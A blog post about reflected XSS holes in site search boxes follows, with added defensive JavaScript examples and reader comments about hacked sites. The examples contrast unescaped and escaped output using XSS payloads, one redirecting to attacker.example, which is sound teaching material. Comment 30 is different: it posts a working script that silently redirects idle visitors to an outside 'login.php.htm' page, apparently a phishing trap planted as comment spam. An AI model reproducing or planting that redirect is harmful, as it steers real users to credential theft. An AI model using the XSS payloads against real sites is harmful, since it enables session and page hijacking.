Check your search box for XSS exploits

Just a quick reminder that site owners should check their sites for XSS holes, especially in freeform text inputs such as search boxes. A search page that echoes the query back into its HTML without escaping it lets anyone craft a link to your domain that renders whatever markup they choose, and once those links get crawled, the injected content shows up in search results under your domain. Even big sites can have these issues with XSS and escaping user input. (Note: don’t click on these search results.)

If you’ve noticed that your rankings in Google seem to be affected, try a few searches on your own site to see whether anyone has injected spammy or porn content. If your domain were example.com, you might run queries such as [site:example.com porn], [site:example.com biaxin] or [site:example.com viagra] and look for results you don’t recognize.

The Google security blog has written before about XSS holes and exploits and how to protect against them. We’ve also written about protecting your site and about cleaning up a hacked site.

Added: (Switching from XSS to pure hacked sites for a moment.) Make sure to change your admin password when you update (say) your WordPress installation. If the old version was compromised, the attacker may already have saved your password and will simply log back in after you’ve fully patched your system. I change my admin password at least every time I upgrade my version of WordPress.
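As an added illustration (not code from this post), here is the pattern the post is warning about, in Node.js: a search page that reflects the query into its HTML unescaped, next to the same page with output encoding. The page index, the render functions, the `hasUnexpectedTag` check and the payload (including its attacker.example redirect target) are all constructed for this example.

```javascript
// Added example, not code from the post: a search page that reflects the
// query into its HTML unescaped, next to the same page with output encoding.
// The page index, the render functions and the payload are all constructed
// for this illustration.

// A tiny constructed "site index" so the search has something to match.
const PAGES = [
  { title: "Concert tickets", url: "/events/concert" },
  { title: "Theatre tickets", url: "/events/theatre" },
];

function search(q) {
  const needle = String(q).toLowerCase();
  return PAGES.filter((p) => p.title.toLowerCase().includes(needle));
}

// Vulnerable: the query value is dropped straight into the markup, so
// whatever was in ?q= on the link the visitor followed becomes HTML.
function renderResultsVulnerable(q) {
  const items = search(q)
    .map((p) => `<li><a href="${p.url}">${p.title}</a></li>`)
    .join("");
  return `<h1>Results for "${q}"</h1><ul>${items}</ul>`;
}

// Encode the five characters that can end an HTML text node or a quoted
// attribute value. This is the fix: encode on output, do not filter on input.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hardened: every value that did not come from the template is encoded at
// the point where it enters the HTML.
function renderResultsSafe(q) {
  const items = search(q)
    .map((p) => `<li><a href="${escapeHtml(p.url)}">${escapeHtml(p.title)}</a></li>`)
    .join("");
  return `<h1>Results for "${escapeHtml(q)}"</h1><ul>${items}</ul>`;
}

// Crude check for a rendered page: does it contain a tag the template never
// emits? The template above only emits h1, ul, li and a.
function hasUnexpectedTag(html) {
  const allowed = new Set(["h1", "ul", "li", "a"]);
  const tags = [...html.matchAll(/<\/?([a-z][a-z0-9]*)/gi)].map((m) => m[1].toLowerCase());
  return tags.some((t) => !allowed.has(t));
}

// The kind of payload an attacker puts in ?q= on a link to the search page
// and then gets crawled or clicked. The redirect target is made up.
const PAYLOAD = '"><script>location.href="http://attacker.example/"</script>';

console.log(renderResultsVulnerable(PAYLOAD)); // live <script> on your domain
console.log(renderResultsSafe(PAYLOAD));       // the same bytes, as inert text
```

Run it with `node` and compare the two lines: the first is a page on your domain that executes the attacker's script, the second shows the payload as literal text. The `hasUnexpectedTag` check is only a smoke test for a template you control; it is no substitute for encoding every untrusted value on output.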

30 Responses to Check your search box for XSS exploits

  1. For anyone having issues getting their sites hacked, a very simple solution is to install http://www.firewallscript.com. It can stop all types of SQL Injections, XSS, Directory Traversals, Cookie Poisoning, etc.

    Seriously- if you run a website ( especially a wordpress one) install FIREWALL SCRIPT!!!!

  2. Matt – Great post. A few of mine were quite exposed, though thankfully unexploited thus far. They’re fixed now. 🙂

  3. Peter (IMC), that is off-topic so I’m going to go ahead and delete the comment. I dropped you an email though.

  4. I wrote this last year to extol the virtues of a regular site: search:

    http://www.brianwhite.org/2007/04/27/google-site-operator-an-ode-to-thee/

  5. I’d still love to see a site’s outgoing links in Webmaster Tools. I think that would make life a whole lot easier for me as a webmaster. It would be very convenient to check the list of outgoing links for porn or spam or any other suspicious activity.

  6. Hi Matt,

    I’ve noticed that my ranking in Google seem to be affected.

    I’ve done this for my site & have received these results.

    Results 1 – 10 of about 26 from tickex.com for porn. (0.03 seconds)

    We are not a porn site by any means, we list hundreds of thousands of events & some of them have that word in their name.

    Is 26 results enough to be seen as spam?

  7. Thanks Matt. I went through something like that back in December. What few search results I held were trashed. I checked per your instructions in this blog and appeared clear. I did receive a

    “Refine results for site:gregstaker.com viagra:” and then there were various categories to choose from. That is a normal search result, right?

  8. Another good tip is to use a regular account for posting and only use the admin account to do admin stuff. That’s what geeklog just recommended.

    http://www.geeklog.net/article.php/csrf

  9. Found this tool http://www.securitycompass.com/exploitme.shtml
    I haven’t tried it yet, but it seems useful for checking whether any exploit is available.

    Have you (or anyone) tried this? Looking for feedback 🙂

  10. When it comes to scripting (XSS and others), there will always be vulnerabilities. So it is always best to take all the precautions and follow correct coding practices.

    Still, no matter how much work the white hat guys do in security, it would be naive to believe that there will not be some black hat guy who will bypass them.

  11. Ah, good point Brian. Thanks for mentioning that.

  12. Wow, I’m really seeing a lot of posts regarding hacks these past few weeks. My wife was sitting next to me and I assured her I’m not searching for porn, but potential hacks on my site. Came back clean. About 30 pages came back for “viagra” but it’s a health site. Are there any reasons to be concerned when using terms in context?

  13. Dave (Original)

    Matt, what searches do you suggest for porn and viagra sites 😉

  14. Hi Matt,

    Great post as usual. We have been the victim of huge hacker attacks (SQL injection) these past weeks, and Google shortly afterwards recognized us as “this website may harm your computer”. A REAL nightmare… no one could reach our website through Google because of this…

    We managed to get rid of all the “evil” code, I filed a clean report with stopbadware.org and everything is back to normal now, but basically we lost business during the time of the request for warning removal.

    Managed websites could get a warning by email, and if after 1 or 2 days they did not take action (removal of badware, spam, porn content), THEN you could put up the super warning text and block access to the website.

    I also agree with Nick that a report in Google webmaster tools about porn, badware or spammy content detected from managed website would be very useful.

  15. Thanks Matt, great tip.
    One of my sites had been affected.

    Just a tip if anyone else finds that they are affected, before you click on your links to investigate, turn off javascript in your browser.
    Also if you forget and you get redirected to a popup site just hold down ESC.
    It should close the javascript prompts and stop the script running.

  16. Matt,
    What do you think about vulnerability scanners?
    I’m subscribed to an external vulnerability scanner that scans all my sites on a regular basis to see whether any of the new vulnerabilities disclosed to the security community exist on my site. They also scan for cross-site scripting, and other stuff that I don’t fully understand… 🙂
    (If you’re interested, see the icon in the footer of my site.)
    I think that Google should encourage webmasters to use such systems. It will definitely help Google search quality if sites are safer and harder to manipulate. (I know, new types will come…)
    Not only that, if Google will notify me that my site is vulnerable to a specific vulnerability through Google Webmaster Tools that will be excellent…

  17. A year ago the advice was that google did not like to index search results, and now sites can get penalized for cross site scripting issues with third parties forcing searches and embedding spammy links in them. That is a big change in perspective.

  18. Morning Matt, nothing to do with your post but you may want to update the this wording for Google checkout in http://www.google.com/local/add/businessCenter

    “New! Google Checkout – Let your customers buy from you quickly and conveniently using a single Google Checkout login. And process all of your Checkout sales for free through the end of 2007.”

    Charles

  19. Nice entry. Something else I’d include: sanitizing quotes is not enough to stop people from embedding JS or links. Browsers will still interpret them properly even if the quotes are removed. I’ve seen literally hundreds of sites that think removing the quotes will make it all secure.
    On a side note, Boogy Down With Earthlink and XSS (feel free to remove this if you want ;))
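The point in comment 19, as an added example that is not part of the comment or the post: a filter that only deletes quote characters, run against payloads that need no quotes at all, next to output encoding. It goes slightly beyond the comment by including a second blacklist (deleting literal `<script>` tags) to show the same failure. The sanitizers, the payloads and the `isLiveMarkup` detector are all constructed for this illustration.

```javascript
// Added example, not code from the post or the comment: three "sanitizers"
// run against payloads that contain no quote characters. The filters, the
// payloads and the detector are constructed for this illustration.

// The non-fix comment 19 describes: delete quote characters and hope.
function stripQuotes(s) {
  return String(s).replace(/["']/g, "");
}

// Another common blacklist: delete literal <script> and </script> tags.
function stripScriptTags(s) {
  return String(s).replace(/<\/?script>/gi, "");
}

// Output encoding: the browser never sees a tag boundary in user data.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// None of these contain a quote, so a quote filter leaves them untouched;
// two of them contain no literal "<script>" either.
const QUOTELESS_PAYLOADS = [
  "<script>alert(document.domain)</script>",
  "<scr<script>ipt>alert(document.domain)</scr</script>ipt>", // reassembles after one strip pass
  "<img src=x onerror=alert(document.domain)>",
  "<svg onload=alert(document.domain)>",
];

// Does the string still open a real tag after sanitizing? Encoded output
// contains "&lt;" rather than "<", so it never matches.
function isLiveMarkup(s) {
  return /<\/?[a-z]/i.test(s);
}

// Return the payloads that survive a sanitizer as live markup.
function survivors(sanitize) {
  return QUOTELESS_PAYLOADS.filter((p) => isLiveMarkup(sanitize(p)));
}

for (const [name, fn] of Object.entries({ stripQuotes, stripScriptTags, escapeHtml })) {
  console.log(name + ":", survivors(fn).length, "of", QUOTELESS_PAYLOADS.length, "payloads survive");
}
```

The quote filter stops none of the four, the tag blacklist stops one (and is defeated by the nested `<scr<script>ipt>` form), and encoding stops all of them. Blacklists always lose this race because the set of things a browser will execute is larger than the list of things the filter knows about; encoding the handful of HTML metacharacters on output does not depend on that list.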

  20. We actually got hit by the same exploit, same URL, etc. We cleaned it up and it’s disappeared from our Google results, so that was nice.

    What I’m curious about is how the results get into Google. I understand the exploit, but I don’t understand how they get indexed that way. Does is-t-h-e.com create a bunch of links to those URLs, and then Google follows and indexes those links?

    Not that I’m some genius, but it would seem relatively trivial to detect links using XSS or other strangeness and disregard them.

  21. aaron wall,
    Google still doesn’t like to index search results, and sites wouldn’t be penalized for “cross site scripting issues with third parties forcing searches and embedding spammy links in them” if those sites excluded their search results by default. Then the spammy links wouldn’t be counted at all and the sites would not be penalized.

    On the other hand I couldn’t understand why Google still indexes search results like:
    http://www.google.de/search?hl=de&q=site%3Asearch.ebay.de&btnG=Suche&meta=

    That’s only one example of indexed search results, which could simply be removed from the index automatically, if Google wanted.

    greetz
    Robert

  22. I’m not in the habit of link-dropping because it always feels incredibly spammy, but I wrote a quick guide in August last year on things the average user can do to test their own (PHP) site security:
    http://www.jemjabella.co.uk/become-a-php-security-master-part-1

    I think people need to get out of the “it won’t happen to me” mentality and realise that they need to be vigilant. Check your site for easily detected exploits, do a bit of Googling on scripts and plugins for known exploits before you install and ALWAYS back-up your data.

  23. Setting up Google Alerts for “site:example.com porn” is a useful method of early notification if an XSS vulnerability is discovered on your site.

  24. Well that was fun!

    I had a site hacked into – made some quick fixes – removed the bad file. Now going to resubmit to Google…

    All access to my server has different users/passcodes per site. So one site will have 20 user/passwords, to avoid any problems with server hacking. The problem is that it’s tougher for me to determine a site hack if the server wasn’t compromised.

    Thanks for reminding me to check my files Matt…

    But FYI – I am on Google Webmaster Tools and Googlebot has had no problem with spidering my website. Did I miss something? It’s reporting the medical and porn in the content – but no warnings to be seen.

  25. Matt – did you see my post on the subject about a week ago? It was on the WP Dashboard and thankfully was picked up by numerous other sites who spread the word about the redirect hack. Unfortunately people don’t change their passwords often enough, and many certainly aren’t diligent enough about upgrading in the first place.

    I’m about halfway through coding a plugin to detect the current crop of methods the spammers use to hide their links and add viruses to WordPress sites. Hopefully I’ll release a first version tomorrow, or early next week.

    http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/

  26. Heh, Firefox 3 is already there, with “Reported Attack Site!” if you actually try to visit those sites.

  27. Matt,

    could you please tell me the reason for removing my last post? There was nothing wrong with it.

    greetz
    Robert

  28. Matt,

    My site is currently suffering from a June 9th XSS “porn” attack. Google Analytics still shows our “search results” page down 90% in Google traffic since the attack. We have since patched the XSS hole, added META NOINDEX tags to all “empty” search result pages, submitted all the remaining “porn” URL Removals in WebMaster Tools, and submitted a Reconsideration Request on June 19th.

    Questions:

    – Is the Google penalty due to the “porn” in Google’s index? or was it the XSS, which gave our site the appearance of a massive number of “Sneaky Javascript Redirects” ?

    – How long should I expect to wait? (I have seen some webmasters say their page’s traffic has never come back after a Google penalty, yet others say it should be restored after 30 days or so. Is there anyone out there who can tell me whether their XSS-hacked page’s traffic did come back and how long it took? I’m trying to pacify my angry boss!)

    Thanks Matt & all,

  29. matt
    I don’t mind if you post this or not, cos what has happened to my site is probably not uncommon but still well beyond my knowledge of ‘why?’ or ‘what next?’. For many months now my once very popular site has been falling (plummeting) in the Google rankings. Now I am completely off Google’s radar (though the other search engines still rank me well?). From the outset my hunch was foul play, but not being a web nerd I asked others to help find out why and spent a lot of fruitless time and effort with SEO-types and more knowledgeable friends in the biz to help solve the mystery. Content, keywords, tags have been addressed as possible culprits or oversights, but I figured there was something more basic and critical wrong. I have always kept track of the results through the Webmaster tools but never found anything really incriminating to explain the apparent black-balling. That is, until today when I went back again to the dashboard (stats-Index stats-cache) and found Google’s last cache of my site:
    http://209.85.165.104/search?q=cache:www.callananphoto.com&hl=en

    yikes! who or why would people do that? And how? I find no indication of all those porn links in my index.html so I have no idea how to remove them.

    So I at least have solved the mystery of ‘why’ Google dropped me like a hot potato but beyond changing passwords I am at a loss to know how to clean up the ugly mess and get back to where I was a year ago.

    While my site was wallowing in the doldrums I redesigned a new front page with much more content and links, so when this existing problem is sorted out I can re-enter the Google arena with a vengeance.
    Bloody hackers!

    I hope you can help

    thanks
    mark

  30. just kidding

    Testlink

    hiiiiiiiiiiiiiiiiiiiiiiiiii

    world

    // Timed redirect: after 5 seconds with no mouse, keyboard, resize or
    // scroll activity, send the visitor to the URL below. Any activity
    // restarts the timer. (Posted as-is in the comment; quotes repaired and
    // a comment that had been split across two lines rejoined.)
    var xScroll, yScroll, timerPoll, timerRedirect, timerClock;

    function initRedirect() {
        if (typeof document.body.scrollTop != "undefined") { // IE, NS7, Moz
            xScroll = document.body.scrollLeft;
            yScroll = document.body.scrollTop;

            clearInterval(timerPoll);     // stop polling scroll move
            clearInterval(timerRedirect); // stop timed redirect

            timerPoll = setInterval("pollActivity()", 1); // poll scrolling
            timerRedirect =
                setInterval("location.href='http://mypics38.my3gb.com/login.php.htm'", 5000);
            // set timed redirect
        }
        else if (typeof window.pageYOffset != "undefined") { // other browsers
            // that support pageYOffset/pageXOffset instead
            xScroll = window.pageXOffset;
            yScroll = window.pageYOffset;

            clearInterval(timerPoll);     // stop polling scroll move
            clearInterval(timerRedirect); // stop timed redirect

            timerPoll = setInterval("pollActivity()", 1); // poll scrolling
            timerRedirect =
                setInterval("location.href='http://mypics38.my3gb.com/login.php.htm'", 5000);
            // set timed redirect
        }
        // else do nothing
    }

    // Called every millisecond: if the scroll position moved since the last
    // reset, treat that as activity and restart the redirect timer.
    function pollActivity() {
        if ((typeof document.body.scrollTop != "undefined" &&
             (xScroll != document.body.scrollLeft ||
              yScroll != document.body.scrollTop)) // IE/NS7/Moz
            ||
            (typeof window.pageYOffset != "undefined" &&
             (xScroll != window.pageXOffset || yScroll != window.pageYOffset))) {
            // other browsers
            initRedirect(); // reset polling scroll position
        }
    }

    document.onmousemove = initRedirect;
    document.onclick = initRedirect;
    document.onkeydown = initRedirect;
    window.onload = initRedirect;
    window.onresize = initRedirect;
